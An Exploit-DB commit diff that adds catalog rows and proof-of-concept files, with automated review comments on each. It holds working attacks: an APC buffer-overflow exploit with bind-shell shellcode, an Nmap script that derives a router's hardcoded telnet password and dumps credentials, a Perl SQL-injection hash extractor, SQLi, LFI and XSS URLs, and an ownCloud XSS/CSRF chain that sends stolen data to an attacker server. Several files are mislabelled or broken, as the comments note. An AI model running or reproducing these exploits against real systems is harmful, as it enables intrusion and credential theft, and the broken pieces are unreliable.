Updated 02_11_2014

Offensive Security 2014-02-11 04:27:22 +00:00
parent 97ddd98874
commit f413cbf3cd
22 changed files with 665 additions and 12 deletions


@ -28324,3 +28324,23 @@ id,file,description,date,author,platform,type,port
31520,platforms/php/webapps/31520.txt,"AuraCMS 2.3 - Multiple Vulnerabilities",2014-02-07,"High-Tech Bridge SA",php,webapps,80
31521,platforms/php/webapps/31521.txt,"doorGets CMS 5.2 - SQL Injection Vulnerability",2014-02-07,"High-Tech Bridge SA",php,webapps,80
31522,platforms/windows/dos/31522.py,"OneHTTPD 0.8 - Crash PoC",2014-02-08,"Mahmod Mahajna (Mahy)",windows,dos,80
31527,platforms/hardware/webapps/31527.nse,"ZTE ZXV10 W300 Router - Hardcoded Credentials",2014-02-09,"Cesar Neira",hardware,webapps,80
31528,platforms/php/webapps/31528.txt,"Le Forum 'Fichier_Acceuil' Parameter Remote File Include Vulnerability",2008-03-24,ZoRLu,php,webapps,0
31529,platforms/php/webapps/31529.txt,"Joomla! and Mambo Cinema Component 1.0 'id' Parameter SQL Injection Vulnerability",2008-03-23,S@BUN,php,webapps,0
31530,platforms/php/webapps/31530.txt,"Joomla! and Mambo Download3000 Component 1.0 'id' Parameter SQL Injection Vulnerability",2008-03-23,S@BUN,php,webapps,0
31531,platforms/php/webapps/31531.pl,"Bomba Haber 2.0 'haberoku.php' SQL Injection Vulnerability",2008-03-25,cOndemned,php,webapps,0
31532,platforms/php/webapps/31532.txt,"Clever Copy 3.0 'postview.php' SQL Injection Vulnerability",2008-03-25,U238,php,webapps,0
31533,platforms/novell/remote/31533.txt,"Novell eDirectory 8.x eMBox Utility 'edirutil' Command Unspecified Vulnerability",2008-03-25,"Nicholas Gregorie",novell,remote,0
31534,platforms/windows/remote/31534.html,"LEADTOOLS Multimedia 15 'LTMM15.DLL' ActiveX Control Arbitrary File Overwrite Vulnerabilities",2008-03-25,shinnai,windows,remote,0
31535,platforms/php/webapps/31535.txt,"phpBB PJIRC Module 0.5 'irc.php' Local File Include Vulnerability",2008-03-25,0in,php,webapps,0
31536,platforms/windows/remote/31536.txt,"File Transfer 1.2 Request File Directory Traversal Vulnerability",2007-11-10,teeed,windows,remote,0
31537,platforms/cgi/webapps/31537.txt,"Blackboard Academic Suite 6/7 webapps/blackboard/execute/viewCatalog searchText Parameter XSS",2008-03-26,Knight4vn,cgi,webapps,0
31538,platforms/cgi/webapps/31538.txt,"Blackboard Academic Suite 6/7 bin/common/announcement.pl data__announcements___pk1_pk2__subject Parameter XSS",2008-03-26,Knight4vn,cgi,webapps,0
31539,platforms/php/webapps/31539.txt,"phpAddressBook 2.0 'index.php' SQL Injection Vulnerability",2008-03-26,"Virangar Security",php,webapps,0
31540,platforms/linux/remote/31540.php,"PECL 3.0.x Alternative PHP Cache Extension 'apc_search_paths()' Buffer Overflow Vulnerability",2008-03-26,dannyp,linux,remote,0
31541,platforms/php/webapps/31541.html,"Invision Power Board 2.x 'Signature' iFrame Security Vulnerability",2008-03-26,SHAHEE_MIRZA,php,webapps,0
31543,platforms/php/webapps/31543.txt,"GeeCarts show.php id Parameter XSS",2008-03-26,"Ivan Sanchez",php,webapps,0
31544,platforms/php/webapps/31544.txt,"GeeCarts search.php id Parameter XSS",2008-03-26,"Ivan Sanchez",php,webapps,0
31545,platforms/php/webapps/31545.txt,"GeeCarts view.php id Parameter XSS",2008-03-26,"Ivan Sanchez",php,webapps,0
31546,platforms/asp/webapps/31546.txt,"DigiDomain 2.2 lookup_result.asp domain Parameter XSS",2008-03-27,Linux_Drox,asp,webapps,0
31547,platforms/asp/webapps/31547.txt,"DigiDomain 2.2 suggest_result.asp Multiple Parameter XSS",2008-03-27,Linux_Drox,asp,webapps,0
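Review bot: The `31527` row (ZTE ZXV10 W300) records port `80` and type `webapps`, but the file it catalogs is an NSE host script whose `@usage` line targets `U:161,T:23` (SNMP and telnet) and never touches HTTP; the port column should say 23 (or 0, as the other non-HTTP rows in this hunk do) and `remote` is the closer type. The `31536` row gives the File Transfer version as `1.2` while the text of that file says versions prior to `1.2f` are affected; pick one and use it in both places.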


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28475/info
DigiDomain is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
DigiDomain 2.2 is vulnerable; other versions may also be affected.
http://www.example.com/lookup/lookup_result.asp?domain=[XSS]&tld=.com


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28475/info
DigiDomain is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
DigiDomain 2.2 is vulnerable; other versions may also be affected.
http://www.www.example.com/lookup/suggest_result.asp?domain=.com&tld=&user=&selecte=1&word1=[XSS]&word2=[XSS]
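Review bot: The PoC host on the last line reads `http://www.www.example.com/...`, a doubled `www.` that the sibling `lookup_result.asp` file in this commit does not have; it should be `http://www.example.com/...`.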


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28455/info
Blackboard Academic Suite is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Blackboard versions prior to 6.3.1.683, 7.0.404.58, 7.1.467.35, 7.2.383.45, and 7.3.216.0 are vulnerable.
http://www.example.com/webapps/blackboard/execute/viewCatalog?type=Course&searchText=?><script>alert(?xss?)</script>
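Review bot: The `?` characters before `><script>` and around the `alert` argument in the PoC URL are charset-conversion residue (typographic quotes rendered as `?`), so the line no longer reproduces the advisory text; rather than carrying the mangled string, use the `[XSS]` placeholder convention the DigiDomain and GeeCarts files in this same commit use.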


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28455/info
Blackboard Academic Suite is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Blackboard versions prior to 6.3.1.683, 7.0.404.58, 7.1.467.35, 7.2.383.45, and 7.3.216.0 are vulnerable.
http://www.example.com/bin/common/announcement.pl?action=ADD&course_id=_137839_1&render_type=EDITABLE&context=course<input type="text" name="data__announcements___pk1_pk2__subject"value=?<script>alert(?worm activated!?)</script>? />
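Review bot: Same conversion damage as the `viewCatalog` file: the `?` characters stand in for lost quote characters, and `name="data__announcements___pk1_pk2__subject"value=` is missing the space between the two attributes, so the line cannot be read back as the advisory's markup. Use the `[XSS]` placeholder used elsewhere in this commit instead of the mangled string.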


@ -0,0 +1,258 @@
# Exploit Title: ZTE ZXV10 W300 router contains hardcoded credentials
# Date: 03 Feb 2014
# Exploit Author: Cesar Neira
# Vendor Homepage: http://wwwen.zte.com.cn/
# Version: ZTE ZXV10 W300 v2.1
# CVE : CVE-2014-0329
# Dork (Shodan): Basic realm="index.htm"
# References:
http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html
local nmap = require "nmap"
local stdnse = require "stdnse"
local snmp = require "snmp"
local vulns = require "vulns"
description = [[
ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the
telnet service on the device. The username is "admin" and the password is
"XXXXairocon" where "XXXX" is the last four characters of the device's MAC
address. The MAC address is obtainable over SNMP with community string public.
]]
author = "Cesar Neira"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"vuln", "exploit", "intrusive"}
---
--
-- @usage nmap -sU -sS -p U:161,T:23 --script=airocon example.org
-- @output
-- PORT STATE SERVICE
-- 23/tcp open telnet
-- 161/udp open|filtered snmp
--
-- Host script results:
-- | airocon:
-- | VULNERABLE:
-- | ZTE ZXV10 W300 router contains hardcoded credentials
-- | State: VULNERABLE (Exploitable)
-- | IDs: CVE:CVE-2014-0329
-- | Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
-- | Description:
-- | ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet
-- | service on the device. The username is "admin" and the password is "XXXXairocon"
-- | where "XXXX" is the last four characters of the device's MAC address. The MAC address
-- | is obtainable over SNMP with community string public.
-- | Disclosure date: 2014-2-3
-- | Exploit results:
-- | admin:1234
-- | support:1234
-- | admin:0E91airocon
-- | References:
-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0329
-- | http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html
-- |_ http://www.kb.cert.org/vuls/id/228886
-- @args community SNMP community (Default: public)
--
---
local DEFAULT_COMMUNITY = "public"
hostrule = function(host)
local snmp_port, telnet_port
snmp_port = nmap.get_port_state(host, {number=161, protocol="udp"})
if not snmp_port and not (snmp_port.state == "open" or snmp_port.state == "open|filtered") then
return false
end
telnet_port = nmap.get_port_state(host, {number=23, protocol="tcp"})
if not telnet_port and not telnet_port.state == "open" then
return false
end
return true
end
local get_mac = function(host, community)
local socket, status, response
socket = nmap.new_socket("udp")
socket:set_timeout(5000)
status, response = socket:connect(host, 161)
if not status then
socket:close()
return status, response
end
local payload, request
request = snmp.buildGetRequest({}, ".1.3.6.1.2.1.2.2.1.6.10000")
payload = snmp.encode(snmp.buildPacket(request, 0, community))
status, response = socket:send(payload)
if not status then
socket:close()
return status, response
end
status, response = socket:receive_bytes(1)
if not status then
socket:close()
return status, response
end
socket:close()
local result
result = snmp.fetchFirst(response)
if not result then
return false, "Unexpected response value."
end
return true, stdnse.tohex(result)
end
local dump_creds = function(host, user, password)
local socket, status, response
socket = nmap.new_socket("tcp")
socket:set_timeout(5000)
status, response = socket:connect(host, 23)
if not status then
socket:close()
return status, response
end
local payload
payload = user .. "\r" .. password .. "\rsh\rlogin show\rexit\r"
status, response = socket:send(payload)
if not status then
socket:close()
return status, response
end
status, response = socket:receive_buf("exit", false)
if not status then
socket:close()
return status, response
end
socket:close()
return true, response
end
local parse_response = function(response)
local index
index = string.find(response, "Username +Password +Priority")
if not index then
return false, "Unexpected response value."
end
index = string.find(response, "\r\n", index) + 2
response = string.sub(response, index)
local result, endl, line
result = {}
index = 0
endl = string.find(response, "\r\n", index)
while endl do
line = string.sub(response, index, endl)
line = string.gsub(line, "\r", "")
line = string.gsub(line, "^ +", "")
line = string.gsub(line, " +$", "")
line = string.gsub(line, " +", " ")
local user, pass, prio
for user, pass, prio in string.gmatch(line, "([^ ]+) ([^ ]+) ([^ ]+)") do
local aux = {}
aux['username'] = user
aux['password'] = pass
aux['priority'] = prio
table.insert(result, aux)
end
index = endl + 2
endl = string.find(response, "\r\n", index)
end
return true, result
end
action = function(host)
local vuln = {
title = "ZTE ZXV10 W300 router contains hardcoded credentials",
state = vulns.STATE.NOT_VULN,
IDS = {CVE = 'CVE-2014-0329'},
risk_factor = "High",
scores = {
CVSSv2 = "9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)",
},
description = [[
ZTE ZXV10 W300 router contains hardcoded credentials that are useable for the telnet
service on the device. The username is "admin" and the password is "XXXXairocon"
where "XXXX" is the last four characters of the device's MAC address. The MAC address
is obtainable over SNMP with community string public.]],
references = {
"http://www.kb.cert.org/vuls/id/228886",
"http://alguienenlafisi.blogspot.com/2014/02/hackeando-el-router-zte-zxv10-w300-v21.html"
},
dates = {
disclosure = {year = 2014, month = 2, day = 3},
},
exploit_results = {},
}
local community
community = stdnse.get_script_args(SCRIPT_NAME .. ".community") or DEFAULT_COMMUNITY
local status, response
status, response = get_mac(host, community)
if not status then
return response
end
local password
password = string.upper(string.sub(response, 9)) .. "airocon"
status, response = dump_creds(host, "admin", password)
if not status then
return response
end
status, response = parse_response( response )
if not status then
return response
end
vuln.state = vulns.STATE.EXPLOIT
for _, data in pairs(response) do
table.insert(vuln.exploit_results, data.username .. ":" .. data.password)
end
return vulns.Report:new(SCRIPT_NAME, host):make_output(vuln)
end
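Review bot: `hostrule` cannot work as written. In the SNMP check, `not snmp_port and not (snmp_port.state == ...)` indexes `snmp_port` when it is nil (a runtime error, since `nmap.get_port_state` returns nil for a port not in the table) and never returns false when the port exists but is not open; the operator has to be `or`. The telnet check repeats the `and` mistake and adds a precedence bug: `not telnet_port.state == "open"` parses as `(not telnet_port.state) == "open"`, which is always false, so that branch never fires either; it needs `telnet_port.state ~= "open"`. Net effect is that the script is not gated on 161/udp and 23/tcp at all. Separately, the Exploit-DB header at the top of the file uses `#` comment lines and a bare URL line, neither of which is Lua syntax, so the file will not load as an NSE script until that block is wrapped in `--[[ ... ]]` or each line is prefixed with `--`.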

platforms/linux/remote/31540.php Executable file

@ -0,0 +1,144 @@
source: http://www.securityfocus.com/bid/28457/info
PECL Alternative PHP Cache (APC) extension is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
Versions prior to APC 3.0.17 are affected.
<?php
/*
* apcsmash.php: PHP-APC-Stacksmash
*
* (c) 2008 dannyp <daniel@papasian.org>
* Feel free to redistribute in any form as long as you leave this
notice intact.
*
* WHAT IS THIS? Code that can run server-side and exploit a flaw in
PHP-APC 3.0.11-3.0.16
* to set up a reverse shell running as the same user that apache runs
under.
*
* WHAT SYSTEMS ARE VULNERABLE? Any system running PHP with APC 3.0.11
through CVS as of
* March 22nd, 2008 (this includes 3.0.16) is vulnerable. This exploit
was written
* specifically to target the case of PHP being ran by the webserver via
mod_php, and
* there is included shellcode for x86 Linux and x86 FreeBSD.
*
* HOW DO I GET IT TO WORK? This is not a script that will work for
scriptkiddies, or
* anyone lacking understanding of buffer overflow exploits. Under
Linux, it appears that
* the APC module gets loaded at a different location each time apache
is started, so you
* need to figure out what the return address is (RETADDR below) and
fill it in. Make sure
* you keep byteorder straight (i.e. on an x86 platform, if you want to
jump to 0xbfa784f8
* you need to have a RETADDR of \xa7\xbf\xf8\x84.
*
* WELL HOW THE HECK DO I DO THAT? The easiest way to figure out the
return address in
* is to attach gdb to one of the apache children, break it on the
exploited function
* in apc.c, and find the address of fileinfo->fullpath and then add a
bit to it so you
* land in the NOOP padding.
*
* WILL YOU HELP ME? I won't help you break into any systems that
aren't yours, so
* no, please don't contact me for technical support for this script. I
do consulting
* work, however, and my rates are very reasonable.
*
* WHAT IF I CANT DO THAT? Well, if you can't do that you're probably
not working on
* a machine that you have permission to be doing this sort of thing
against, so you should
* really consider buggering off
*
* BUT DOESNT THAT MAKE THIS VULNERABILITY HARMLESS? No, it certainly
doesn't, because
* apache has a (good) habit of respawning itself, so if you needed to
exploit the
* vulnerability without the privilege of being able to attach a
debugger to apache,
* you can just brute force it. The easiest way to do that would be to
have the return
* address be passed to this script via a $_GET variable, and then set
some script up
* to loop through the values you need to try. As you increase the
amount of pre-shellcode
* nooop padding, this actually becomes an easier and easier task, as
you can jump quite
* a bit on each try.
*
* SO IS THIS EXPLOIT USELESS IF I CANT RUN PHP ON THE TARGET MACHINE?
Yes.
*
* SO IS THIS VULNERABILITY USELESS IF I CANT RUN PHP ON THE TARGET?
No! This vulnerability
* opens people up to real attack in any case where include() and
friends are called with
* user input. This is a SUPER-set of a well known class of
vulnerabilities in PHP
* scripts called remote file inclusion (RFI) vulnerabilities. Standard
RFI vulnerabilities
* are easily mitigated by allow_url_fopen being turned off and (to deal
with NULs) magic
* quotes turned on. This attack vector requires neither!
*
* TELL ME MORE ABOUT THE SHELLCODE. The Linux shellcode is courtesy
http://shellcode.org/Shellcode/linux/bind/
* and launches a reverse shell on port 20000. The FreeBSD shellcode is
the author's own,
* and it doesn't properly initalize a sockaddr_in so it will bind to a
different port at different
* times (this is to be considered a feature, not a bug) but will
consistently take a port above 1024.
*/
// Delete this line, or you'll surely be disappointed. I don't plan on
this being used as an RFI payload...
exit();
// Set the system you're trying to target here
$system = 'Linux';
if($system == 'FreeBSD') {
/* How many NOOPs to write before the shellcode */
define('PREPAD', 400);
define('SHELLCODE',
"\x31\xc0\x50\xeb\x7d\xcd\x80\xc3\x5b\xb0\x17\xe8\xf5\xff\xff\xff\x31\xc0\x88\x43\x07\x88\x43\x0b\x89\x43\x10\x40\x50\x40\x50\xb0\x61\xe8\xdf\xff\xff\xff\x89\xc1\xb2\x10\x52\x8d\x53\x0c\x52\x50\xb0\x68\xe8\xce\xff\xff\xff\xb0\x6a\xe8\xc7\xff\xff\xff\x31\xc0\x50\x50\x51\xb0\x1e\xe8\xbb\xff\xff\xff\x89\xc2\x5a\x50\x31\xd2\xb2\x03\xb0\x5a\xe8\xac\xff\xff\xff\x66\xff\x44\x24\x04\xfe\xca\x75\xf0\xb0\x02\xe8\x9c\xff\xff\xff\x85\xc0\x75\xd1\x31\xc9\x8d\x43\x08\x51\x50\x89\xe0\x50\x50\x53\x31\xc0\xb0\x3b\xe8\x83\xff\xff\xff\xe8\x81\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58\x2d\x69\x20\x58\x80\x80\xa7\x22\xff\xff\xef\x1d\xff\xff\xef\x1d\x1d");
/* Our target return address */
define ('RETADDR', "\xbf\xbf\xb8\xc5");
/* Padding after the shellcode and before the return address,
for alignment purposes */
define ('POSTPAD', 12);
} else {
define('PREPAD', 4000);
define('SHELLCODE',"\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80\x89\xc7\x52\x66\x68\x4e\x20\x43\x66\x53\x89\xe1\xb0\xef\xf6\xd0\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80\xb0\x66\x43\x43\xcd\x80\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x51\x53\x89\xe1\xb0\xf4\xf6\xd0\xcd\x80");
define ('POSTPAD', 17);
define ('RETADDR', "\xa7\xbf\xf8\x84");
}
define ('RETADDRCOUNT', 500);
$string = "";
for($i = 0; $i < PREPAD; ++$i) {
$string .= "\x90";
}
$string .= SHELLCODE;
for($i = 0; $i < POSTPAD; ++$i) {
$string .= "\x90";
}
for($i = 0; $i < RETADDRCOUNT; ++$i) {
$string .= RETADDR;
}
// At this point you could print the string out and use it to attack
remote scripts, if you wanted.
include($string);
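Review bot: The header comment contradicts itself in two places a reader of this archive will trip over. It calls the Linux payload a "reverse shell on port 20000" while crediting `shellcode.org/Shellcode/linux/bind/`, and the bytes themselves go through the bind/listen/accept `socketcall` sequence, so "bind shell" is the accurate description. The byte-order example ("to jump to 0xbfa784f8 you need a RETADDR of \xa7\xbf\xf8\x84") is not the little-endian encoding of that address, and the Linux `RETADDR` constant copies the same bytes, so the sentence and the constant disagree with the address they claim to represent; either the address or the bytes in the comment is wrong. The mitigation sentence is also dated: turning off `allow_url_fopen` does not by itself stop URL includes on PHP 5.2 and later, which gate `include()` of URLs on the separate `allow_url_include` directive (off by default).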


@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/28441/info
Novell eDirectory is prone to an unspecified vulnerability that can result in unauthorized file access or a denial of service.
Unauthenticated attackers can exploit this issue.
This issue affects eDirectory 8.8 (and earlier) as well as 8.7.3.9 (and earlier).
java -cp eMBoxClient.jar embox -i
login -s edir_ip_address -p port (port can be 8008, 8009, 80, 443, 8030)
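Review bot: The file shows how to open an eMBox client session (`java -cp eMBoxClient.jar embox -i`, then `login -s ... -p ...`) and nothing about the `edirutil` issue the CSV row names, so a reader gets the access path and no reproduction step or indicator for the actual bug. If the advisory gives no more than this, the file should say so rather than leaving a login transcript that reads like a PoC.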


@ -10,13 +10,9 @@
# Vendor fixed: January 22th, 2014
# CVE assignment: CVE-2014-1665
A malicious ownCloud user can upload a file with JavaScript code in the filename, share it, and
cause a XSS attack when the victim tries to either view the contents of the file or delete the
file.
A malicious ownCloud user can upload a file with JavaScript code in the filename, share it, and cause a XSS attack when the victim tries to either view the contents of the file or delete the file.
If the victim is an ownCloud administrator, an attacker can force the mounting of the webserver's
local file system, leading to unauthorized access to server resources and potentially shell
access.
If the victim is an ownCloud administrator, an attacker can force the mounting of the webserver's local file system, leading to unauthorized access to server resources and potentially shell access.
=======================
=Proof of Concept.....=
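Review bot: The context line at the top of the hunk reads `January 22th, 2014`; it should be `22nd`. It is outside the changed lines, but since this commit is already reflowing the paragraphs of this file, fix it in the same pass.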
@ -38,6 +34,7 @@ Both a) and b) options will result in Javascript being executed in the victim's
** **
** NOTE: Replace [ATTACKER'S WEBSERVER] with the attacker's domain/IP. **
** NOTE: Replace [ATTACKER] with the attacker's account on ownCloud. **
** NOTE: Replace [VICTIM] with the victim's ownCloud domain/IP. **
** **
@ -53,8 +50,7 @@ document.location='http://[ATTACKER'S WEBSERVER]/ownCloudhack.php?rt='+z";>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>OwnCloud 6.0.0a XSS and CSRF Protection Bypass</title>
<script type="text/javascript"
src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
</head>
<body>
<span id="container"></span>
@ -72,13 +68,12 @@ src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
event.preventDefault();
$.ajax({
type: 'POST',
url: 'http://[ATTACKER'S WEBSERVER]/index.php/apps/files_external/ajax/addMountPoint.php',
url: 'http://[VICTIM]/index.php/apps/files_external/ajax/addMountPoint.php',
data: $(this).serialize(),
xhrFields: {
withCredentials: true
},
dataType: 'json',
}
});
});
</script>
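Review bot: The trailing comma after `dataType: 'json',` (context line just before the closing `}` of the options object) is a syntax error in IE 8 and earlier, which treat a trailing comma in an object literal as an error; since the page pulls in jQuery 1.10.x, presumably for old-browser reach, drop the comma. The URL change itself is right: the forged POST has to go to the victim's ownCloud origin for `withCredentials: true` to carry the session cookie, and the `[ATTACKER'S WEBSERVER]` left in the hunk header's `document.location` line is the attacker-side collector, so it is correctly untouched. The NOTE block added earlier in this file defines `[VICTIM]`, so the placeholders are now consistent.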
@ -92,7 +87,7 @@ src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
event.preventDefault();
$.ajax({
type: 'POST',
url: 'http://[ATTACKER'S WEBSERVER]/index.php/settings/ajax/enableapp.php',
url: 'http://[VICTIM]/index.php/settings/ajax/enableapp.php',
data: $(this).serialize(),
xhrFields: {
withCredentials: true
@ -110,7 +105,7 @@ src="http://ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
$("#container").text("Mounting the root filesystem...");
};
function redirect() {
window.location.href = 'http://[ATTACKER'S WEBSERVER]/';
window.location.href = 'http://[VICTIM]/';
$("#container").text("Redirecting back home ;)");
};
setTimeout(function() {ext();}, 0);


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/28423/info
Le Forum is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/forum_path/fora-acc.php3?Fichier_Acceuil=ZoRLu.txt?
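Review bot: The PoC line ends in a stray `?` after `ZoRLu.txt`, the same conversion residue seen in the Blackboard files in this commit; as stored the line does not reproduce the advisory text cleanly. The parameter spelling `Fichier_Acceuil` matches the CSV row, so leave that as the application's own name.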

platforms/php/webapps/31529.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/28427/info
The Cinema component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects Cinema 1.0; other versions may also be vulnerable.
http://www.example.com/index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(username,0x3a,password)/**/from/**/jos_users/*
http://www.example.com/index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,29,29,30,concat(username,0x3a,password)/**/from/**/jos_users/*
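Review bot: The two lines enumerate different column counts (the first runs 0..32 before `concat`, the second 0..30), which may be deliberate for two builds of the component, but the second lists `29` twice (`...27,29,29,30...`) where the sequence reads as a copy error for `28,29`. The numbers are only positional markers so this is cosmetic, but since these files are read as reference material, correct the sequence or note which release each line corresponds to.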


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28428/info
The Download3000 component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The issue affects Download3000 1.0; other versions may also be vulnerable.
http://www.example.com/index.php?option=com_d3000&task=showarticles&id=-99999/**/union/**/select/**/0,username,pass_word/**/from/**/admin/*

platforms/php/webapps/31531.pl Executable file

@ -0,0 +1,47 @@
source: http://www.securityfocus.com/bid/28435/info
Bomba Haber is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Bomba Haber 2.0 is vulnerable; other versions may also be affected.
#!D:\Perl\Bin\Perl.exe
use LWP::UserAgent;
#
# XLPortal <= 2.2.4 (search) Remote SQL Injection Exploit
# Coded by cOndemned
# Greetz : irk4z, GregStar, NoRuless, Tomu, Happy B'day Avantura ;*
#
print "\r\n[~] XLPortal <= 2.2.4 (search) Remote SQL Injection Exploit";
print "\r\n[~] Coded by cOndemned [22.03.2008]\r\n";
if (@ARGV < 2) {
print "[~] Usage : $0 <target_host> <pref>\r\n"; # default pref is xlp / xlportal
exit();
}
$head = new LWP::UserAgent;
$head->agent("Opera/9.26 (Windows NT 5.1; U; pl)");
my $request = HTTP::Request->new(POST => $ARGV[0]."/index.php");
$buff = "%27+union+select+1%2Cconcat%28user%2C0x3a%2Cpassword%29+from+".$ARGV[1]."_users+%2F*";
$request->content_type('application/x-www-form-urlencoded');
$request->content("page=Szukaj&op=Wyszukaj&query=".$buff."&section_News=1&section_Download=1&s".
"ection_Links=1&section_Articles=1&exact=any&sort=alpha&=Rozpocznij+wyszukiw".
"anie");
$response = $head->request($request);
if (($response->content =~ /([a-zA-Z]+?):([0-9,a-f]{32})/)) {
print "[+] Login : $1\r\n";
print "[+] Haslo : $2\r\n";
}
else {
print "\r\n[~] This one isn't vulnerable, or bad data was given\r\n";
exit();
}
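Review bot: The script body does not match its catalog entry. The CSV row and the SecurityFocus lead-in describe a Bomba Haber 2.0 `haberoku.php` SQL injection, but the Perl code is the author's `XLPortal <= 2.2.4 (search)` exploit: it POSTs to `index.php` with Polish form fields (`Szukaj`, `Wyszukaj`, `Rozpocznij wyszukiwanie`) and reads from `<pref>_users`, and nothing in it references `haberoku.php`. Either the wrong file was attached to BID 28435 or the entry needs re-titling. Minor: the shebang `#!D:\Perl\Bin\Perl.exe` is a Windows-local path, and the match class `[0-9,a-f]{32}` includes a literal comma, so it is looser than the 32-hex-digit hash it is meant to capture.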


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/28437/info
Clever Copy is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Clever Copy 3.0 is vulnerable; other versions may also be affected.
http://www.example.com/path/postview.php?ID='+union+select+username,concat(0x706173737764,char(58),password,0x2D2D2D,0x757365726E616D653ADA,username),1,5,username,username,6,username,username,9,username+from+cc_admin/*


@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/28446/info
The PJIRC module for phpBB is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
http://www.example.com/forum/irc/irc.php?phpEx=./../../../../../../etc/passwd

platforms/php/webapps/31539.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/28456/info
phpAddressBook is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
phpAddressBook 2.0 is vulnerable; other versions may also be affected.
The following proof of concept is available:
login:admin ' or 1=1/*
password:[blank]


@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/28466/info
Invision Power Board (IP.Board) is prone to a security vulnerability that can aid attackers in social-engineering attacks.
Attacker-supplied script code could exploit vulnerabilities in the user's browser or give the user a false sense of security when visiting trusted web pages, which can aid in launching further attacks.
This issue affects IP.Board 2.3.1; other versions may also be affected.
<html> <head> <title>HACKED BY YOUR-NAME</title> </head> <body> <div id="iFrame1" style="position:absolute; left:0px; top:0px; z- index:0"> <iframe name="iFrame1" width=1024 height=3186 src="http://www.example.com/ YOUR-PATH/YOUR.html" scrolling="no" frameborder="0"></iframe> </div> </body> </html>
